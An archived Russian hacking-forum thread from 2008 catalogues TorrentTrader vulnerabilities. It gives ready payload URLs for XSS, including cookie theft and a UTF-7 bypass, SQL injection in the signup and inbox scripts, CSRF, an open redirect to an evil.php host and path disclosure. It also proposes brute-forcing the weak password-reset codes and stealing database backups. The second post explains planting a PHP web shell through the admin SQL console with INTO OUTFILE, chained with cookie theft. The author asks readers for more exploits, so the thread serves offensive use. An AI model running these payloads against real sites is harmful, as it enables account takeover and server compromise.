ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[ Обзор уязвимостей TorrentTrader ]
  #1  
Старый 27.07.2008, 04:18
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
Thumbs up [ Обзор уязвимостей TorrentTrader ]

Уязвимости TorrentTrader


Офф сайт разработчика: torrenttrader.org
На сегодняшний день последняя версия: FINAL v1.08 Notes(2008-06-17)
Скачать отсюда:
http://sourceforge.net/project/showfiles.php?group_id=98584&package_id=180927&rel ease_id=545219
TorrentTrader – набирающий популярность торрент движок по размещению и скачиванию торрентов.


Для начала рассмотрим публичные уязвимости под различные версии:

TorrentTrader 1.0 SQL Inject

Эксплойт: TorrentTrader 1.0 RC2 SQL Injection © By aCiDBiTS

TorrentTrader Classic v1.07

Тут у нас пару XSS от хакиря «HACKERS PAL»

Примеры:
Код:
http://site.com/tracker/pjirc/css.php?color=<script>alert(document.cookie);</script>
Код:
http://site.com/tracker/browse.php?cat=<script>alert(document.cookie);</script>
TorrentTrader Classic Edition 1.08

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" в сценарии account-inbox.php. Удаленный пользователь может с помощью специально сформированного частного сообщения выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:
Код:
http://site.com/tracker/account-inbox.php?msg=<script>alert('XSS')</script>
2. Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов перед отправкой частного сообщения. Удаленный пользователь может с помощью специально сформированной ссылки отправить произвольное сообщение пользователям приложения.

Пример:
Код:
http://site.com/tracker/account-inbox.php?msg=<message>&receiver=<username>
3. Уязвимость существует из-за недостаточной обработки входных данных в параметре "url" в сценарии redirect.php. Злоумышленник может с помощью специально сформированной ссылки перенаправить пользователя на потенциально небезопасный сайт.

Пример:
Код:
http://site.com/tracker/redirect.php?url=http://remote_host/evil.php
Баги обнаружены 03 марта, 2008 © securitylab.ru

TorrentTrader версии 1.08 до 17.06.2008

1. Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "email" и "wantusername" в сценарии account-signup.php и в параметре "receiver" в сценарии account-inbox.php (когда установлен параметр "msg"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.


Примеры:
Код:
http://site.com/tracker/account-signup.php?wantusername=’
Код:
http://site.com/tracker/account-signup.php?email=’
Код:
http://site.com/tracker/account-inbox.php?msg=’
Баги обнаружены 18 июня, 2008 © securitylab.ru

++++++++++++++
Теперь поинтереснее, баги найденные модератором античата gibson`om, для:


TorrentTrader v2.04:

1. Раскрытие пути и системная информация
check.php
ps если админ его не удалил, а то маячит в админке, так что не вариант, что файл будет на сайте.

2. Слабый пароль.
Меняем пасс через востановление и пасс меняется в диапозоне 10000 до 50000 только цифры. Можно написать брут на перле имхо идеальный вариант будет и перебрутить пасс.
ps Нужно мыло пользователя!

3. Возможно "тырить" бекап бд
backup-database.php buckup будет в /backups в формате
$db-$year$month$day-$hour$min.gz

ps если знаем название базы.

4. Xss
В сообщениях все фильтруется, но если используется кодировка utf 7, то все поля подверженны ксс.
Код:
+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-
В админке везде ксс, практически ничего не фильтруется.

xss при отправке репорта ([Report Torrent]), отправляем мессагу вставляем любые теги (активка). Мессага пойдет админу!

[c] gibson

++++++++++++++
Ну и далее пару мелких багов найденных мною.

TorrentTrader Classic Edition 1.08
XSS:
Код:
http://site.com/tracker/account-inbox.php?receiver=<script>alert('Nightmare')</script>
Далее установил последнюю версию:
FINAL v1.08 Notes(2008-06-17) (скачал сегодня)
Наткнулся на раскрытие пути:
Код:
http://site.com/tracker/torrents-search.php?search=&cat[]=
Код:
http://site.com/tracker/torrents-details.php?id[]=
Поиск багов в прогрессе… ©

Кто ещё чем сможет дополнить, просьба публиковать различные сплойты, публичные, или найденные вами дырки.
Как показывают опросы, этот движок пользуется спросом в локалках разных провайдеров, так что… так..

 
Ответить с цитированием

  #2  
Старый 27.07.2008, 14:43
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Заливка шелла через админку в последней версии FINAL v1.08 Notes(2008-06-17)
Идём в раздел "Database\База данных"
Далее выполняем SQL запрос:

Код:
SELECT '<? echo "shell"; ?>' FROM users INTO OUTFILE "/home/localhost/www/tt/shell.php"
Запрос выполняется замечательно.

Далее, войти в админку можно утащив куки с помощью XSS, а получить полный путь до файла можно с помощью раскрытия пути.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03
[ Обзор уязвимостей eXV2 CMS ] ~!DoK_tOR!~ Сценарии/CMF/СMS 2 22.12.2009 13:00
[ Обзор уязвимостей Zorum ] ~!DoK_tOR!~ Форумы 1 12.08.2008 01:16
[ Обзор уязвимостей phpWebNews ] ~!DoK_tOR!~ Сценарии/CMF/СMS 0 26.07.2008 23:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ